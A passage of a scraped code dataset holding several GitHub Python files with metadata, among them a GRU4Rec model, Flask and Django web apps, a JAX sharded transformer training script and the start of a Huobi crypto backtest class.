enumerate(cut_offs.tolist()):\n self.log(f'recall_cutoff_{k}', recall[i])\n self.log(f'mrr_cutoff_{k}', mrr[i])\n self.log('test_seq_len', x_hat.shape[1])\n self.log('test_loss', test_loss)\n\n def configure_optimizers(self):\n if self.optimizer == 'adam':\n optimizer = torch.optim.Adam(self.parameters(), lr=self.learning_rate)\n elif self.optimizer == 'adagrad':\n optimizer = torch.optim.Adagrad(self.parameters(), lr=self.learning_rate)\n else:\n raise ValueError('Optimizer not supported, please use adam or adagrad')\n return optimizer\n", "repo_name": "otto-de/TRON", "sub_path": "src/gru4rec/model.py", "file_name": "model.py", "file_ext": "py", "file_size_in_byte": 6959, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 44, "dataset": "github-code", "pt": "31", "api": [{"api_name": "torch.matmul", "line_number": 16, "usage_type": "call"}, {"api_name": "pytorch_lightning.LightningModule", "line_number": 28, "usage_type": "attribute"}, {"api_name": "warnings.warn", "line_number": 56, "usage_type": "call"}, {"api_name": "warnings.warn", "line_number": 63, "usage_type": "call"}, {"api_name": "torch.nn.Embedding", "line_number": 67, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 67, "usage_type": "name"}, {"api_name": "torch.nn.Embedding", "line_number": 69, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 69, "usage_type": "name"}, {"api_name": "torch.nn.Embedding", "line_number": 71, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 71, "usage_type": "name"}, {"api_name": "torch.nn.Embedding", "line_number": 76, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 76, "usage_type": "name"}, 
{"api_name": "torch.nn.Embedding", "line_number": 78, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 78, "usage_type": "name"}, {"api_name": "torch.nn.init.xavier_uniform_", "line_number": 80, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 80, "usage_type": "attribute"}, {"api_name": "math.sqrt", "line_number": 80, "usage_type": "call"}, {"api_name": "torch.nn.init.xavier_uniform_", "line_number": 81, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 81, "usage_type": "attribute"}, {"api_name": "math.sqrt", "line_number": 81, "usage_type": "call"}, {"api_name": "torch.nn.GRU", "line_number": 83, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 83, "usage_type": "name"}, {"api_name": "torch.nn.ELU", "line_number": 89, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 89, "usage_type": "name"}, {"api_name": "torch.nn.Identity", "line_number": 91, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 91, "usage_type": "name"}, {"api_name": "torch.nn.Parameter", "line_number": 94, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 94, "usage_type": "name"}, {"api_name": "torch.eye", "line_number": 94, "usage_type": "call"}, {"api_name": "torch.zeros", "line_number": 95, "usage_type": "call"}, {"api_name": "torch.ones", "line_number": 96, "usage_type": "call"}, {"api_name": "torch.ones", "line_number": 97, "usage_type": "call"}, {"api_name": "src.shared.loss.bce_loss", "line_number": 100, "usage_type": "name"}, {"api_name": "src.shared.loss.sampled_softmax_loss", "line_number": 102, "usage_type": "name"}, {"api_name": "functools.partial", "line_number": 105, "usage_type": "call"}, {"api_name": "src.shared.loss.bpr_max_loss", "line_number": 105, "usage_type": "argument"}, {"api_name": "torch.concat", "line_number": 121, "usage_type": "call"}, {"api_name": "src.shared.loss.calc_loss", "line_number": 128, "usage_type": "call"}, {"api_name": "torch.tensor", "line_number": 138, "usage_type": "call"}, {"api_name": "src.shared.evaluate.validate_batch_per_timestamp", "line_number": 139, "usage_type": "call"}, {"api_name": "src.shared.loss.calc_loss", "line_number": 140, "usage_type": "call"}, {"api_name": "torch.optim.Adam", "line_number": 151, "usage_type": "call"}, {"api_name": "torch.optim", "line_number": 151, "usage_type": "attribute"}, {"api_name": "torch.optim.Adagrad", "line_number": 153, "usage_type": "call"}, {"api_name": "torch.optim", "line_number": 153, "usage_type": "attribute"}]}
+{"seq_id": "30868441916", "text": "# Import flask from the Flask library\nfrom flask import Flask, render_template, request, session\nfrom flask_session import Session\n\n# Import the translation function\nfrom translate import detect, translate\n\n# Import the dpla search\nfrom dpla import dpla\n\n# Use CSV reader to read in Amazon Listings\nimport csv\n\n# Create a Flask object and pass in __name__\napp = Flask(__name__)\n\n# Configure session\napp.config[\"SESSION PERMANENT\"] = False\napp.config[\"SESSION_TYPE\"] = 'filesystem'\nSession(app)\n\nDATABASE = [\n \"All\", \"Dpla\", \"Amazon Listings\", \"Europana\"\n]\n\nLANGUAGES = {\n 'ar': 'Arabic',\n 'cs': 'Czech',\n 'de': 'German',\n 'el': 'Greek',\n 'es': 'Spanish',\n 'fr': 'French',\n 'ga': 'Irish',\n 'he': 'Hebrew',\n 'it': 'Italian',\n 'ja': 'Japanese',\n 'ko': 'Korean',\n 'ms': 'Malay',\n 'ru': 'Russian',\n 'sw': 'Swahili',\n 'ur': 'Urdu',\n 'zh-CN': 'Chinese'\n}\n\n# Set the url ending, this is a root path\n@app.route('/')\ndef greet():\n return render_template(\"greet.html\")\n\n@app.route('/select')\ndef select():\n return render_template(\"select.html\", database=DATABASE)\n\n@app.route('/language')\ndef language():\n name = request.args.get(\"name\")\n database = request.args.get(\"database\")\n session[\"name\"] = name\n session[\"database\"] = database\n\n langauge = detect(name).lang\n output = []\n\n for key in LANGUAGES:\n temp = dict()\n temp['language'] = LANGUAGES[key]\n temp['text'] = translate(dest=key, string=name).text\n output.append(temp)\n\n return render_template(\"language.html\", name=name, database=database,\n langauge=langauge, output=output)\n\n@app.route('/result')\ndef result():\n name = session.get(\"name\")\n database = session.get(\"database\")\n\n dpla_data = dpla(tosearch=name)\n return render_template(\"result.html\", name=name, database=database, dpla_data=dpla_data)\n\n@app.route('/amazon')\ndef amazon():\n with open(\"images.txt\", 'r') as f:\n content_list = f.readlines()\n content_list = content_list[0].replace(\"[\", \"\").replace(\"]\",\"\").\\\n replace(\"src=\", \"\").replace('\"', '').replace(\"'\",\"\").split(\",\")\n return render_template('amazon.html', dress=content_list)\n\nif __name__ == '__main__':\n app.run()\n\n\n\n\n\n\n", "repo_name": "Towerhint/is310_final_project", "sub_path": "Project/app.py", "file_name": "app.py", "file_ext": "py", "file_size_in_byte": 2269, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "31", "api": [{"api_name": "flask.Flask", "line_number": 15, "usage_type": "call"}, {"api_name": "flask_session.Session", "line_number": 20, "usage_type": "call"}, {"api_name": "flask.render_template", "line_number": 48, "usage_type": "call"}, {"api_name": "flask.render_template", "line_number": 52, "usage_type": "call"}, {"api_name": "flask.request.args.get", "line_number": 56, "usage_type": "call"}, {"api_name": "flask.request.args", "line_number": 56, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 56, "usage_type": "name"}, {"api_name": "flask.request.args.get", "line_number": 57, "usage_type": "call"}, {"api_name": "flask.request.args", "line_number": 57, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 57, "usage_type": "name"}, {"api_name": "flask.session", "line_number": 58, "usage_type": "name"}, {"api_name": "flask.session", "line_number": 59, "usage_type": "name"}, {"api_name": "translate.detect", "line_number": 61, "usage_type": "call"}, {"api_name": 
"translate.translate", "line_number": 67, "usage_type": "call"}, {"api_name": "flask.render_template", "line_number": 70, "usage_type": "call"}, {"api_name": "flask.session.get", "line_number": 75, "usage_type": "call"}, {"api_name": "flask.session", "line_number": 75, "usage_type": "name"}, {"api_name": "flask.session.get", "line_number": 76, "usage_type": "call"}, {"api_name": "flask.session", "line_number": 76, "usage_type": "name"}, {"api_name": "dpla.dpla", "line_number": 78, "usage_type": "call"}, {"api_name": "flask.render_template", "line_number": 79, "usage_type": "call"}, {"api_name": "flask.render_template", "line_number": 87, "usage_type": "call"}]}
+{"seq_id": "26460325638", "text": "#!/usr/bin/env python\nimport subprocess\nimport os\nimport io\n\n\nn = 5\nresults = []\nchecked_results = []\nmaple = float(\"4.545447652E6\")\nmin_time = float('inf')\n\nfor i in range(0, n, 1):\n result = []\n print(i)\n proc = subprocess.Popen([os.getcwd() + \"/a.out\"], stdout=subprocess.PIPE)\n for line in io.TextIOWrapper(proc.stdout, encoding=\"utf-8\"):\n result.append(line)\n res = result[0].strip()[8:]\n time = result[2].strip()[6:]\n results.append((res, time))\n\nfor el in results:\n if (abs(maple - float(el[0])) / maple) < 0.01:\n checked_results.append(el)\n time = float(el[1])\n if time < min_time:\n min_time = time\n\nprint(\"cheked results = \", checked_results)\nprint(\"min_time = \", min_time)\n", "repo_name": "KushnirDmytro/Lab2Check", "sub_path": "Labs/Petruk___Romanjuk/integral_concurrency/run.py", "file_name": "run.py", "file_ext": "py", "file_size_in_byte": 747, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "31", "api": [{"api_name": "subprocess.Popen", "line_number": 16, "usage_type": "call"}, {"api_name": "os.getcwd", "line_number": 16, "usage_type": "call"}, {"api_name": "subprocess.PIPE", "line_number": 16, "usage_type": "attribute"}, {"api_name": "io.TextIOWrapper", "line_number": 17, "usage_type": "call"}]}
+{"seq_id": "36816968039", "text": "#!/usr/bin/env python3\r\nimport sys\r\nimport os\r\nimport argparse\r\nfrom collections import defaultdict\r\n\r\ndef ArgumentParser():\r\n parser = argparse.ArgumentParser(\r\n description='Statistic file number in a given directory and its subdirectories')\r\n parser.add_argument(\"--dir\",\"-d\", help='give a directory', required=True)\r\n parser.add_argument(\"--out\",\"-o\",help=\"output name\")\r\n parser.add_argument(\"--maxdepth\",\"-m\",default=999,type=int,help=\"max depth directory query\")\r\n args = parser.parse_args()\r\n return args\r\n\r\ndef DirectoryParser(path,maxdepth):\r\n out = defaultdict(lambda : 0)\r\n for root, dirs, files in os.walk(path):\r\n n_depth = len(root.split(os.sep))\r\n if n_depth > maxdepth: continue\r\n nFiles = len(files)\r\n out[root] += nFiles\r\n out[path] += nFiles\r\n print(f\"{root}\\t{nFiles}\")\r\n return out\r\n\r\ndef output(dat, file_name):\r\n with open(file_name,'w') as fh:\r\n for key in sorted(dat.keys()):\r\n fh.write(f\"{key}\\t{dat[key]}\\n\")\r\n\r\ndef main():\r\n args = ArgumentParser()\r\n \r\n data = DirectoryParser(args.dir,args.maxdepth)\r\n output(data,args.out)\r\n\r\nif __name__ == '__main__':\r\n main()\r\n \r\n", "repo_name": "zhunshi/ztool", "sub_path": "bin/FileNumberStat.py", "file_name": "FileNumberStat.py", "file_ext": "py", "file_size_in_byte": 1213, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "31", "api": [{"api_name": "argparse.ArgumentParser", "line_number": 8, "usage_type": "call"}, {"api_name": "collections.defaultdict", "line_number": 17, "usage_type": "call"}, {"api_name": "os.walk", "line_number": 18, "usage_type": "call"}, {"api_name": "os.sep", "line_number": 19, "usage_type": "attribute"}]}
+{"seq_id": "35674100186", "text": "from data import Dataloader\nfrom model import CausalTransformer\nimport jax.numpy as jnp\nimport jax\n\nGPTConfig = {\n 'n_vocab': 66,\n 'block_size': 32,\n 'n_layer' : 3,\n 'n_head' : 8,\n 'd_model' : 768,\n 'shards': 2,\n 'devices': 4,\n 'batch_size_per_parallel': 256,\n 'ckpt_dir': 'test'}\n\n# A downside of using the more memory efficient method of embedding sharding is that it requires equal shard size across devices\n# or a 'check which device I'm on, lookup desired shard size'. For the moment - easier to just have a few empty spots for tokens.\n\nassert GPTConfig['n_vocab'] % GPTConfig['shards'] == 0\n\n\nds = Dataloader(GPTConfig)\nmodel = CausalTransformer(GPTConfig)\n\n\nx,y = ds.next_batch() # [B,T], [B,T]\n\nwith jax.experimental.maps.mesh(*model.mesh_def):\n state = model.init(jnp.array(model.key.take(GPTConfig['shards'])), x)\n\n\n\nfrom tqdm import tqdm\n\nlosses = []\nwith jax.experimental.maps.mesh(*model.mesh_def):\n steps = [t for t in range(0, 10000)]\n pbar = tqdm(steps)\n for t in pbar:\n x,y = ds.next_batch()\n loss, state = model.train(state, x,y)\n if t % 100 == 0:\n pbar.set_description(f\"Loss: {loss.mean()}\")\n losses.append(loss.mean())\n\n# Non auto-regressive sampling (works faster so you can see if it broadly making sense after 15 minutes)\nwith jax.experimental.maps.mesh(*model.mesh_def):\n x,y = ds.next_batch()\n y_pred = model.forward(state['params'], x)\n y_pred_logit = jnp.argmax(y_pred, -1)\n \n for i in range(0,100):\n print(''.join([ds.itos[c] for c in list(y_pred_logit[i])]))\n print('--------------------------')", "repo_name": "sholtodouglas/scalingExperiments", "sub_path": "minTransformerSharded/train.py", "file_name": "train.py", "file_ext": "py", "file_size_in_byte": 1636, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 45, "dataset": "github-code", "pt": "31", "api": [{"api_name": "data.Dataloader", "line_number": 23, "usage_type": "call"}, {"api_name": "model.CausalTransformer", "line_number": 24, "usage_type": "call"}, {"api_name": "jax.experimental.maps.mesh", "line_number": 29, "usage_type": "call"}, {"api_name": "jax.experimental", "line_number": 29, "usage_type": "attribute"}, {"api_name": "model.mesh_def", "line_number": 29, "usage_type": "attribute"}, {"api_name": "model.init", "line_number": 30, "usage_type": "call"}, {"api_name": "jax.numpy.array", "line_number": 30, "usage_type": "call"}, {"api_name": "jax.numpy", "line_number": 30, "usage_type": "name"}, {"api_name": "model.key.take", "line_number": 30, "usage_type": "call"}, {"api_name": "model.key", "line_number": 30, "usage_type": "attribute"}, {"api_name": "jax.experimental.maps.mesh", "line_number": 37, "usage_type": "call"}, {"api_name": "jax.experimental", "line_number": 37, "usage_type": "attribute"}, {"api_name": "model.mesh_def", "line_number": 37, "usage_type": "attribute"}, {"api_name": "tqdm.tqdm", "line_number": 39, "usage_type": "call"}, {"api_name": "model.train", "line_number": 42, "usage_type": "call"}, {"api_name": "jax.experimental.maps.mesh", "line_number": 48, "usage_type": "call"}, {"api_name": "jax.experimental", "line_number": 48, "usage_type": "attribute"}, {"api_name": "model.mesh_def", "line_number": 48, "usage_type": "attribute"}, {"api_name": "model.forward", "line_number": 50, "usage_type": "call"}, {"api_name": "jax.numpy.argmax", "line_number": 51, "usage_type": "call"}, {"api_name": "jax.numpy", "line_number": 51, "usage_type": "name"}]}
+{"seq_id": "44177596294", "text": "from .models import User\nfrom django.shortcuts import render, redirect\nfrom .forms import CustomUserCreationForm, CustomUserChangeForm\nfrom django.contrib.auth.forms import AuthenticationForm, PasswordChangeForm\nfrom django.contrib import messages\nfrom django.contrib.auth import (\n login as auth_login,\n logout as auth_logout,\n)\nfrom django.contrib.auth.decorators import login_required\nfrom articles.models import Team\nfrom django.http import JsonResponse, QueryDict\nfrom django.views.decorators.http import require_http_methods, require_POST, require_safe\n\ndef signup(request):\n teams = Team.objects.all()\n if request.method == \"POST\":\n form = CustomUserCreationForm(request.POST)\n if form.is_valid():\n user = form.save(commit=False)\n user.team = Team.objects.get(pk=int(request.POST.get(\"team\")))\n user.save()\n auth_login(request, user)\n return redirect(\"articles:index\")\n else:\n form = CustomUserCreationForm()\n context = {\n \"form\": form,\n \"teams\":teams,\n }\n return render(request, \"accounts/signup.html\", context)\n\ndef login(request):\n if request.method == \"POST\":\n form = AuthenticationForm(request, data=request.POST)\n if form.is_valid():\n auth_login(request, form.get_user())\n messages.success(request, \"로그인 되었습니다.\")\n return redirect(\"articles:index\")\n else:\n form = AuthenticationForm()\n context = {\n \"form\": form,\n }\n return render(request, \"accounts/login.html\", context)\n\n@login_required\ndef logout(request):\n auth_logout(request)\n messages.success(request, \"로그아웃 되었습니다.\")\n return redirect(\"articles:index\")\n\ndef profile(request, pk):\n user = User.objects.get(pk=pk)\n if user.team :\n team = Team.objects.get(pk=user.team_id)\n context = {\n 'team': team,\n 'request_user': user,\n 'pk': pk,\n 'username': user.username,\n 'email': user.email,\n 'name': user.last_name,\n 'nickname': user.nickname,\n }\n else :\n context = {\n 'request_user': user,\n 'pk': pk,\n 'username': user.username,\n 'email': user.email,\n 'name': user.last_name,\n 'nickname': user.nickname,\n }\n return render(request, 'accounts/profile.html', context)\n\n@require_POST\ndef follow(request, pk):\n if request.user.is_authenticated:\n user = User.objects.get(pk=pk)\n if user != request.user:\n if user.followers.filter(pk=request.user.pk).exists():\n user.followers.remove(request.user)\n is_followed = False\n else:\n user.followers.add(request.user)\n is_followed = True\n follow_user = user.followers.filter(pk=request.user.pk)\n following_user = user.followings.filter(pk=request.user.pk)\n follow_user_list = []\n following_user_list = []\n for follow in follow_user:\n follow_user_list.append({'pk': follow.pk, 'nickname': follow.nickname, 'img': follow.team.logo.url})\n for following in following_user:\n following_user_list.append({'pk': following.pk, 'username': following.username,})\n context = {\n 'is_followed': is_followed,\n 'follow_user': follow_user_list,\n 'following_user': following_user_list,\n 'followers_count': user.followers.count(),\n 'followings_count': user.followings.count(),\n }\n return JsonResponse(context)\n return redirect('accounts:profile', user.pk)\n return redirect('accounts:login')\n\n@require_POST\ndef update(request):\n teams = Team.objects.all()\n user = User.objects.get(pk=request.user.pk)\n if request.method == 'POST':\n if request.user.is_authenticated:\n form = CustomUserChangeForm(data=request.POST, instance=request.user)\n if form.is_valid():\n user = form.save(commit=False)\n user.team = 
Team.objects.get(pk=int(request.POST.get(\"team\")))\n user.save()\n return redirect('accounts:profile', request.user.pk)\n else:\n form = CustomUserChangeForm(instance=user)\n context = {\n 'form': form,\n \"teams\":teams,\n }\n return render(request, 'accounts/update.html', context)\n\n@login_required\ndef password(request):\n if request.method == 'POST' :\n if request.user.is_authenticated:\n form = PasswordChangeForm(request.user, request.POST)\n if form.is_valid():\n user = form.save()\n auth_login(request, user)\n return redirect('accounts:profile', request.user.pk)\n else:\n form = PasswordChangeForm(request.user)\n context = {\n 'form': form,\n }\n return render(request, 'accounts/password.html', context)\n\n@login_required\ndef delete(request):\n request.user.delete()\n auth_logout(request)\n return redirect('articles:index')", "repo_name": "kmk4162/YammyChu", "sub_path": "accounts/views.py", "file_name": "views.py", "file_ext": "py", "file_size_in_byte": 5168, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 3, "dataset": "github-code", "pt": "31", "api": [{"api_name": "articles.models.Team.objects.all", "line_number": 16, "usage_type": "call"}, {"api_name": "articles.models.Team.objects", "line_number": 16, "usage_type": "attribute"}, {"api_name": "articles.models.Team", "line_number": 16, "usage_type": "name"}, {"api_name": "forms.CustomUserCreationForm", "line_number": 18, "usage_type": "call"}, {"api_name": "articles.models.Team.objects.get", "line_number": 21, "usage_type": "call"}, {"api_name": "articles.models.Team.objects", "line_number": 21, "usage_type": "attribute"}, {"api_name": "articles.models.Team", "line_number": 21, "usage_type": "name"}, {"api_name": "django.contrib.auth.login", "line_number": 23, "usage_type": "call"}, {"api_name": "django.shortcuts.redirect", "line_number": 24, "usage_type": "call"}, {"api_name": "forms.CustomUserCreationForm", "line_number": 26, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 31, "usage_type": "call"}, {"api_name": "django.contrib.auth.forms.AuthenticationForm", "line_number": 35, "usage_type": "call"}, {"api_name": "django.contrib.auth.login", "line_number": 37, "usage_type": "call"}, {"api_name": "django.contrib.messages.success", "line_number": 38, "usage_type": "call"}, {"api_name": "django.contrib.messages", "line_number": 38, "usage_type": "name"}, {"api_name": "django.shortcuts.redirect", "line_number": 39, "usage_type": "call"}, {"api_name": "django.contrib.auth.forms.AuthenticationForm", "line_number": 41, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 45, "usage_type": "call"}, {"api_name": "django.contrib.auth.logout", "line_number": 49, "usage_type": "call"}, {"api_name": "django.contrib.messages.success", "line_number": 50, "usage_type": "call"}, {"api_name": "django.contrib.messages", "line_number": 50, "usage_type": "name"}, {"api_name": "django.shortcuts.redirect", "line_number": 51, "usage_type": "call"}, {"api_name": "django.contrib.auth.decorators.login_required", "line_number": 47, "usage_type": "name"}, {"api_name": "models.User.objects.get", "line_number": 54, "usage_type": "call"}, {"api_name": "models.User.objects", "line_number": 54, "usage_type": "attribute"}, {"api_name": "models.User", "line_number": 54, "usage_type": "name"}, {"api_name": "articles.models.Team.objects.get", "line_number": 56, "usage_type": "call"}, {"api_name": "articles.models.Team.objects", "line_number": 56, "usage_type": "attribute"}, {"api_name": 
"articles.models.Team", "line_number": 56, "usage_type": "name"}, {"api_name": "django.shortcuts.render", "line_number": 75, "usage_type": "call"}, {"api_name": "models.User.objects.get", "line_number": 80, "usage_type": "call"}, {"api_name": "models.User.objects", "line_number": 80, "usage_type": "attribute"}, {"api_name": "models.User", "line_number": 80, "usage_type": "name"}, {"api_name": "django.http.JsonResponse", "line_number": 103, "usage_type": "call"}, {"api_name": "django.shortcuts.redirect", "line_number": 104, "usage_type": "call"}, {"api_name": "django.shortcuts.redirect", "line_number": 105, "usage_type": "call"}, {"api_name": "django.views.decorators.http.require_POST", "line_number": 77, "usage_type": "name"}, {"api_name": "articles.models.Team.objects.all", "line_number": 109, "usage_type": "call"}, {"api_name": "articles.models.Team.objects", "line_number": 109, "usage_type": "attribute"}, {"api_name": "articles.models.Team", "line_number": 109, "usage_type": "name"}, {"api_name": "models.User.objects.get", "line_number": 110, "usage_type": "call"}, {"api_name": "models.User.objects", "line_number": 110, "usage_type": "attribute"}, {"api_name": "models.User", "line_number": 110, "usage_type": "name"}, {"api_name": "forms.CustomUserChangeForm", "line_number": 113, "usage_type": "call"}, {"api_name": "articles.models.Team.objects.get", "line_number": 116, "usage_type": "call"}, {"api_name": "articles.models.Team.objects", "line_number": 116, "usage_type": "attribute"}, {"api_name": "articles.models.Team", "line_number": 116, "usage_type": "name"}, {"api_name": "django.shortcuts.redirect", "line_number": 118, "usage_type": "call"}, {"api_name": "forms.CustomUserChangeForm", "line_number": 120, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 125, "usage_type": "call"}, {"api_name": "django.views.decorators.http.require_POST", "line_number": 107, "usage_type": "name"}, {"api_name": "django.contrib.auth.forms.PasswordChangeForm", "line_number": 131, "usage_type": "call"}, {"api_name": "django.contrib.auth.login", "line_number": 134, "usage_type": "call"}, {"api_name": "django.shortcuts.redirect", "line_number": 135, "usage_type": "call"}, {"api_name": "django.contrib.auth.forms.PasswordChangeForm", "line_number": 137, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 141, "usage_type": "call"}, {"api_name": "django.contrib.auth.decorators.login_required", "line_number": 127, "usage_type": "name"}, {"api_name": "django.contrib.auth.logout", "line_number": 146, "usage_type": "call"}, {"api_name": "django.shortcuts.redirect", "line_number": 147, "usage_type": "call"}, {"api_name": "django.contrib.auth.decorators.login_required", "line_number": 143, "usage_type": "name"}]}
+{"seq_id": "32286058637", "text": "import json\nimport sys\nfrom django.db import transaction\nfrom django.core.management.base import BaseCommand\n\nfrom catalog.models import Location, PublicPlace, SocialInfo, WorkingSchedule, PhoneContact\n\n\nclass Command(BaseCommand):\n help = 'Load datasets of ...'\n\n @transaction.atomic\n def get_data(self):\n with open('data.txt', mode='r', encoding='utf-8') as json_file:\n data = json.load(json_file)\n for obj in data:\n public_place, _isCreated = PublicPlace.objects.get_or_create(\n name=obj['name'],\n city_id=obj['city_id'],\n country_id=obj['country_id'],\n category_id=obj['category_id']\n )\n\n location, _isCreated = Location.objects.get_or_create(\n public_place=public_place,\n address=obj['address']\n )\n # social\n if obj['socials']['facebook']:\n SocialInfo.objects.get_or_create(\n public_place=public_place,\n name_social=\"Facebook\",\n link=obj['socials']['facebook']\n )\n\n if obj['socials']['facebook']:\n SocialInfo.objects.get_or_create(\n public_place=public_place,\n name_social=\"Instagram\",\n link=obj['socials']['instagram']\n )\n\n # schedule\n schedule_object = obj['schedule']\n days_names = [('Mon', 'Monday'), ('Tue', 'Tuesday'), ('Wed', 'Wednesday'), ('Thu', 'Thursday'),\n ('Fri', 'Friday'), ('Sat', 'Saturnday'), ('Sun', 'Sunday')]\n if schedule_object:\n for day_tuple_item in days_names:\n day_name_short = day_tuple_item[0]\n day_name_long = day_tuple_item[1]\n\n schedule_in_mon_from_to = schedule_object[day_name_short][0]\n schedule_in_mon_from = schedule_object[day_name_short][0][0:5]\n schedule_in_mon_to = schedule_object[day_name_short][0][8:]\n\n break_in_mon = schedule_object[day_name_short][1]\n\n if 'Без перерви' == break_in_mon:\n break_from = '00:00'\n break_to = '00:00'\n else:\n break_from = schedule_object[day_name_short][1][0:5]\n break_to = schedule_object[day_name_short][1][8:]\n\n WorkingSchedule.objects.get_or_create(\n location=location,\n day=day_name_long,\n work_time_from=schedule_in_mon_from,\n work_time_to=schedule_in_mon_to,\n break_time_from=break_from,\n break_time_to=break_to\n )\n\n # phone\n for phone in obj['phones']:\n PhoneContact.objects.get_or_create(\n location=location,\n phone=phone\n )\n\n def handle(self, *args, **options):\n self.get_data()\n self.stdout.write(self.style.SUCCESS('Script successfully finished!'))\n", "repo_name": "andreea0008/cc_server_side_python", "sub_path": "catalog/management/commands/parser.py", "file_name": "parser.py", "file_ext": "py", "file_size_in_byte": 3459, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "31", "api": [{"api_name": "django.core.management.base.BaseCommand", "line_number": 9, "usage_type": "name"}, {"api_name": "json.load", "line_number": 15, "usage_type": "call"}, {"api_name": "catalog.models.PublicPlace.objects.get_or_create", "line_number": 17, "usage_type": "call"}, {"api_name": "catalog.models.PublicPlace.objects", "line_number": 17, "usage_type": "attribute"}, {"api_name": "catalog.models.PublicPlace", "line_number": 17, "usage_type": "name"}, {"api_name": "catalog.models.Location.objects.get_or_create", "line_number": 24, "usage_type": "call"}, {"api_name": "catalog.models.Location.objects", "line_number": 24, "usage_type": "attribute"}, {"api_name": "catalog.models.Location", "line_number": 24, "usage_type": "name"}, {"api_name": "catalog.models.SocialInfo.objects.get_or_create", "line_number": 30, "usage_type": "call"}, {"api_name": "catalog.models.SocialInfo.objects", 
"line_number": 30, "usage_type": "attribute"}, {"api_name": "catalog.models.SocialInfo", "line_number": 30, "usage_type": "name"}, {"api_name": "catalog.models.SocialInfo.objects.get_or_create", "line_number": 37, "usage_type": "call"}, {"api_name": "catalog.models.SocialInfo.objects", "line_number": 37, "usage_type": "attribute"}, {"api_name": "catalog.models.SocialInfo", "line_number": 37, "usage_type": "name"}, {"api_name": "catalog.models.WorkingSchedule.objects.get_or_create", "line_number": 65, "usage_type": "call"}, {"api_name": "catalog.models.WorkingSchedule.objects", "line_number": 65, "usage_type": "attribute"}, {"api_name": "catalog.models.WorkingSchedule", "line_number": 65, "usage_type": "name"}, {"api_name": "catalog.models.PhoneContact.objects.get_or_create", "line_number": 76, "usage_type": "call"}, {"api_name": "catalog.models.PhoneContact.objects", "line_number": 76, "usage_type": "attribute"}, {"api_name": "catalog.models.PhoneContact", "line_number": 76, "usage_type": "name"}, {"api_name": "django.db.transaction.atomic", "line_number": 12, "usage_type": "attribute"}, {"api_name": "django.db.transaction", "line_number": 12, "usage_type": "name"}]}
+{"seq_id": "19415226401", "text": "# -*— coding:utf-8 -*-\r\nimport copy\r\nimport time\r\nimport datetime\r\nimport math\r\nimport random\r\nimport pandas as pd\r\nimport asyncio\r\nfrom alpha.utils import logger\r\nfrom six.moves import xrange, zip\r\nimport numpy as np\r\nimport strategies as ST\r\nfrom market.huobi import HuobiMarket\r\nfrom alpha.tasks import LoopRunTask, SingleTask\r\nfrom alpha.order import Order\r\nfrom alpha.asset import Asset\r\nfrom alpha.position import Position\r\nfrom alpha.quant import quant\r\n\r\n\r\nIS_CLOSE = False\r\n\r\n# 回测数据市场撒旦法\r\nclass HuobiTestMarket(object):\r\n def __init__(self, market_config):\r\n super().__init__()\r\n self.market_config = market_config\r\n self.market = HuobiMarket(market_config)\r\n self.trader = self.market.trader\r\n self.now_timeline = int(time.time() - (2) * 24 * 3600)\r\n # self.now_timeline = int(time.time() - 5.5 * 3600)\r\n # self.now_timeline = 1615917738\r\n\r\n self.init_timeline = self.now_timeline\r\n self.klines_data = {}\r\n self.asset_list = []\r\n self.op_time = []\r\n self.inited = False\r\n self.level = int(market_config['level'])\r\n self.face_value = self.market.face_value\r\n\r\n SingleTask.run(self.InitMarket)\r\n self.klines_idx = {}\r\n self.last_tick_time = -1\r\n self.last_minut_s = -1\r\n self.last_tick_data = dict()\r\n self.high_first = False\r\n\r\n self.position = Position()\r\n self.position.long_quantity = 0\r\n self.position.short_quantity = 0\r\n self.tot_fee = 0\r\n self.free_asset = 100\r\n self.deal_count = 0\r\n self.tot_asset = self.free_asset\r\n self.init_asset = self.free_asset\r\n\r\n self.ask1_price = 0 # 卖一价格\r\n self.bid1_price = 0 # 买一价格\r\n\r\n async def InitMarket(self):\r\n the_start_time = self.now_timeline - 6 * 3600\r\n for period, step in [('1min', 120000 - 60), ('5min', 600000 - 60 * 5), ('15min', 1800000 - 60 * 15), ]:\r\n # for period, step in [('1min', 120000 - 60)]:\r\n if period in self.klines_data:\r\n continue\r\n\r\n now_time = the_start_time\r\n self.klines_data[period] = []\r\n print(\"{} period data start inited\".format(period), end='', flush=True)\r\n\r\n while now_time + step + 1 < time.time():\r\n data = await self.market.GetKLines(period, now_time, now_time + step + 1)\r\n if not data:\r\n await asyncio.sleep(0.04)\r\n continue\r\n if self.klines_data[period] and self.klines_data[period][-1]['id'] == data[0]['id']:\r\n data.remove(data[0])\r\n self.klines_data[period].extend(data)\r\n now_time += step\r\n print(\"\\r{} period data init process: {:.2f}%\".format(period, 100 * (now_time - the_start_time) / (time.time() - the_start_time)), end='', flush=True)\r\n\r\n while 1:\r\n data = await self.market.GetKLines(period, now_time, time.time())\r\n if not data:\r\n await asyncio.sleep(0.04)\r\n continue\r\n if self.klines_data[period] and self.klines_data[period][-1]['id'] == data[0]['id']:\r\n data.remove(data[0])\r\n self.klines_data[period].extend(data)\r\n print(\"\\r{} period data init process: 